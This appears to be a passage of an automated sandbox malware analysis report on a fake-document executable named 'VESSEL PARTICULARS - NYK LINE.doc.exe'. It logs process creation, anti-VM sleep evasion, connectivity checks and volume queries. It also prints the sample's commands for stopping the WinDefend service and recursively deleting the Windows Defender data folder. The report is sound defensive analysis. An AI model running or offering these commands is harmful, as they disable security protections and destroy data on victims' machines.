                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 340Thread sleep time: -33000s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 396Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 3224Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep count: 2860 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep count: 545 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6344Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2860
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 545
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2802
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2598
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4968
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3977
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4042
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502968851.00000000013C3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllers\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=SUAVTZKUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSER.
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
